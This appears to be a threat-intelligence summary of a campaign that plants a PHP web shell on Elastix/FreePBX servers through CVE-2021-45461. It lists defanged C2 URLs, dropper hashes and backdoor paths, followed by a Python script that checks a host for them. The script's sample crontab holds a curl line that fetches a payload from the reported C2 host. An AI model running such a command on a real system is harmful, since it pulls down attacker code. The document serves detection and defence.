
Researchers have brought to light a campaign targeting the Elastix system used in Digium phones.
The exploited vulnerability, tracked as CVE-2021-45461 with a CVSS score of 9.8, exists in the Rest Phone Apps module and was abused to implant a web shell on VoIP servers. The attackers used the web shell to exfiltrate data, dropping additional payloads inside the target's Digium phone software.
A high volume of malicious traffic, likely originating from more than 500,000 unique malware samples, was observed over the period from mid-December 2021 to the end of March 2022. The traffic targets Digium's open source Asterisk communication software for VoIP phone devices.
The attack chain starts with initial code that retrieves a shell script dropper from a remote server, which in turn downloads and executes an obfuscated PHP backdoor in multiple locations on the file system.
The PHP backdoor also creates several root user accounts and sets up a scheduled task to maintain persistence and re-infect the host system.
The malware accepts arbitrary commands via the cmd request parameter, along with a set of built-in default commands, which lets the operators carry out further malicious activity on the compromised host.
This research was conducted and documented by researchers from Palo Alto Networks.
Indicators of Compromise
- hxxp[://]37[.]49[.]230[.]74/k[.]php
- hxxp[://]37[.]49[.]230[.]74/z/wr[.]php
- hxxp[://]37[.]49[.]230[.]74/z/post/noroot[.]php
- hxxp[://]37[.]49[.]230[.]74/z/post/root[.]php
Original Shell Scripts – SHA256 hashes
- 000a3688455edacc1dac17539797dc98f055091898a65cd520fb8459c1bc2a2a
- 0012342749e3bae85a9269a93661e2eb00437c71b2bca2eaca458147f9fe8471
- 001305bd3be538e50014d42f02dee55056b73a1df770e2605aded8a970091f2f
- 0050232e04880fbe1d0c670b711b66bb46c32febdc9513074612c90f1f24631b
- 0059d7b736dc1e61bd5b22fff601579fbc8a12b00981fdd34fd13f0fb44688b0
- 0088cba19eec78daee0310854c4bf8f7efc64b89bdc7517f0a1c7ebbba673f72
Local Filepaths
- /var/www/html/admin/assets/ajax.php
- /var/www/html/admin/assets/config.php
- /var/www/html/admin/assets/js/config.php
- /var/www/html/admin/modules/core/ajax.php
- /var/www/html/digium_phones/ajax.php
- /var/www/html/rest_phones/ajax.php
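The indicators above translate directly into a host-side check a defender can run on an Elastix/FreePBX server: look for the listed backdoor paths, hash anything found against the published dropper hashes, and look for the two persistence mechanisms the report describes (extra UID 0 accounts and a scheduled task reaching back to the C2 host). The script below is an added example written for this page, not code from the report or from Palo Alto Networks; the file paths, hashes and C2 address come from the indicator lists above, while the `build_constructed_fixture` helper and the `SAMPLE_PASSWD` / `SAMPLE_CRONTAB` strings are constructed sample data so the check can be exercised offline.

```python
"""Host-side IoC check for the Elastix/FreePBX web shell campaign (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path

# File paths the report lists as drop locations of the PHP backdoor.
IOC_PATHS = [
    "/var/www/html/admin/assets/ajax.php",
    "/var/www/html/admin/assets/config.php",
    "/var/www/html/admin/assets/js/config.php",
    "/var/www/html/admin/modules/core/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/rest_phones/ajax.php",
]

# SHA256 hashes of the original shell script droppers, as listed in the report.
IOC_SHA256 = {
    "000a3688455edacc1dac17539797dc98f055091898a65cd520fb8459c1bc2a2a",
    "0012342749e3bae85a9269a93661e2eb00437c71b2bca2eaca458147f9fe8471",
    "001305bd3be538e50014d42f02dee55056b73a1df770e2605aded8a970091f2f",
    "0050232e04880fbe1d0c670b711b66bb46c32febdc9513074612c90f1f24631b",
    "0059d7b736dc1e61bd5b22fff601579fbc8a12b00981fdd34fd13f0fb44688b0",
    "0088cba19eec78daee0310854c4bf8f7efc64b89bdc7517f0a1c7ebbba673f72",
}

# C2 host from the report's (de-fanged) URL indicators.
C2_HOST = "37.49.230.74"

# Constructed sample inputs for offline testing; not captured from a real host.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin\n"
    "backup2:x:0:0::/root:/bin/bash\n"
)
SAMPLE_CRONTAB = (
    "# constructed sample crontab\n"
    "*/5 * * * * root /usr/bin/curl -s http://37.49.230.74/k.php -o /tmp/k.php\n"
    "0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf\n"
)


def sha256_of(path: Path) -> str:
    """Stream a file through SHA256 so large files do not need to be read at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_ioc_paths(root: str = "/") -> list:
    """Report every listed path that exists under `root`, with its hash.

    Presence of a listed file is itself worth reviewing; `known_ioc` is True only
    when the hash matches one of the published dropper hashes. `root` defaults to
    the live filesystem; tests pass a scratch directory instead.
    """
    findings = []
    for ioc in IOC_PATHS:
        candidate = Path(root) / ioc.lstrip("/")
        if not candidate.is_file():
            continue
        digest = sha256_of(candidate)
        findings.append({"path": ioc, "sha256": digest, "known_ioc": digest in IOC_SHA256})
    return findings


def extra_root_accounts(passwd_text: str) -> list:
    """Return account names other than 'root' that carry UID 0 in /etc/passwd content.

    The report states the backdoor creates several root user accounts.
    """
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def cron_lines_referencing_c2(crontab_text: str) -> list:
    """Return non-comment crontab lines that reference the reported C2 host.

    The report describes a scheduled task used for persistence and re-infection.
    """
    pattern = re.compile(re.escape(C2_HOST))
    return [line for line in crontab_text.splitlines()
            if pattern.search(line) and not line.lstrip().startswith("#")]


def build_constructed_fixture(content: bytes = b"abc") -> str:
    """Create a scratch directory holding one listed path with harmless content (test helper)."""
    root = tempfile.mkdtemp(prefix="elastix_ioc_")
    target = Path(root) / IOC_PATHS[0].lstrip("/")
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(content)
    return root


if __name__ == "__main__":
    for finding in scan_ioc_paths():
        print(f"{finding['path']}: present, sha256={finding['sha256']}, known dropper hash={finding['known_ioc']}")
    passwd_file = Path("/etc/passwd")
    if passwd_file.exists():
        print("extra UID 0 accounts:", extra_root_accounts(passwd_file.read_text()))
    crontab_file = Path("/etc/crontab")
    if crontab_file.exists():
        print("cron lines referencing C2:", cron_lines_referencing_c2(crontab_file.read_text()))
```

Run it as root on the PBX host to cover the web root and system files; it checks only `/etc/crontab`, so per-user crontabs under `/var/spool/cron` and `/etc/cron.d` entries need the same `cron_lines_referencing_c2` pass if you want full coverage of scheduled tasks.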